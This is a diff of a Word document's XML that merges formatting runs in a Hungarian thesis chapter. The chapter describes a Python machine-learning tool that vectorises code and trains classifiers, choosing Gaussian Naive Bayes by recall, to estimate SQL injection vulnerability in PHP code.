-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -18594,7 +16516,6 @@
         </w:rPr>
         <w:t>max_vocab</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -18631,7 +16552,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> (</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -18640,7 +16560,6 @@
         </w:rPr>
         <w:t>max_length</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -18665,7 +16584,6 @@
         </w:rPr>
         <w:t>va van egy számláló (</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -18674,7 +16592,6 @@
         </w:rPr>
         <w:t>word_freqs</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -18687,52 +16604,40 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">word2index, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>word2index, indextoword</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, egy </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>táblázat</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>indextoword</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, egy </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>táblázat</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
         <w:t>dataset</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -18768,19 +16673,11 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>collectVocab</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">collectVocab: </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18800,7 +16697,6 @@
         </w:rPr>
         <w:t xml:space="preserve">a </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -18809,7 +16705,6 @@
         </w:rPr>
         <w:t>word_freqs</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -18822,23 +16717,13 @@
         </w:rPr>
         <w:t xml:space="preserve"> teszi a </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>dataset</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">dataset </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18897,19 +16782,11 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>createLookupTables</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">createLookupTables: </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18967,7 +16844,6 @@
         </w:rPr>
         <w:t xml:space="preserve">a </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -18976,7 +16852,6 @@
         </w:rPr>
         <w:t>word_freqs</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -19099,19 +16974,11 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>value</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>-</w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>value-</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19137,16 +17004,8 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>value</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>-value</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -19180,19 +17039,11 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>createVectors</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">createVectors: </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19212,41 +17063,57 @@
         </w:rPr>
         <w:t xml:space="preserve">a </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>dataset</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve">dataset </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>0.oszlopának</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> szavain, és a hozzájuk tartozó</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>0.oszlopának</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> szavain, és a hozzájuk tartozó</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>word2indenx</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-beli</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> indexet </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">az </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19254,25 +17121,32 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>word2indenx</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>-beli</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> indexet </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">az </w:t>
+        <w:t xml:space="preserve">X </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>változóba</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> gyűjti</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, aminek a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> hosszát később módosítja a </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19280,86 +17154,33 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">X </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>változóba</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> gyűjti</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>, aminek a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> hosszát később módosítja a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve">max_length </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>változóban megadottra, így a vektorok hossza egységes marad.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Másrészt a </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>max_length</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>változóban megadottra, így a vektorok hossza egységes marad.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Másrészt a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>dataset</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">dataset </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19607,33 +17428,15 @@
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>\machine_learning_app\</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>machine_learning_app</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
         <w:t>tanulo_adatok</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:highlight w:val="yellow"/>
@@ -19711,19 +17514,11 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>saveVectorAs</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">saveVectorAs: </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19757,21 +17552,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> változókat lementi egy-egy .</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>npy</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> fájlba.</w:t>
+        <w:t xml:space="preserve"> változókat lementi egy-egy .npy fájlba.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -19780,22 +17561,497 @@
         <w:ind w:firstLine="567"/>
         <w:jc w:val="both"/>
         <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> program utolsó és legfontosabb </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>lépésé</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ben a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\machine_learning_app</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\trainer.py</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-on be</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">lül </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>hajtja végre a program legfőbb feladatát: betanítja a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> választott </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">algoritmust és </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ad</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">egy </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">becslést </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>egy ismeretlen</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> PHP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>kód SQL injectionbeli sebezhetőségével kapcsolatban.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Implementált metódusai:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listaszerbekezds"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="29"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1134" w:hanging="283"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>main</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Metódus, amely </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">egyrészt beolvassa a „toimport” numpy fájlokat, amiket a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">classifier2 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">metódusnak ad át, másrészt </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">beolvassa a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">„test” </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>n</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ump</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>y fájlokat</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, amiket </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>feloszt</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> az algoritmus tanítására </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>A</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> program utolsó és legfontosabb lepésében a</w:t>
+        <w:t>trainX, train</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Y</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>és tesztelésére</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>testX, testY</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ~80</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>~</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>20% arányban</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A felügyelt tanulás 5 fő algoritmusára </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">van meghívva </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a test_bmodel metódus</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Az általa visszaadott metrikák segítségével hasonlítottam össze az algoritmusokat</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>aminek az eredményét a 3.5-ös ábra táblázata mutatja.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Látható, hogy a Gaussian Naive Bayes éri el a legnagyobb értéket 73,9%-os pontossággal. Bár minden futás során újragerenálódnak ezek az értékek, de a végeredmény ugyan az: a GaussianNB 73% és 77% közötti Recall értékkel az első helyen marad, így a tanulást már ez az algoritmus végzi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a classifier met</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ódus </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>segítségével.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listaszerbekezds"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="29"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1134" w:hanging="283"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">test_bmodel: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Metódus, amely metrikákat biztosít a paraméterként megadott teszt adatok és osztályozás által. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Már említettem</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a korábbi fejezetben,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> hogy</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a Confusion Matrix Recall értéke a leghasznosabb, ha egy kód </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>sérülékenységéről van sz</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ó, így ezt a metrikát alkalmazom </w:t>
+      </w:r>
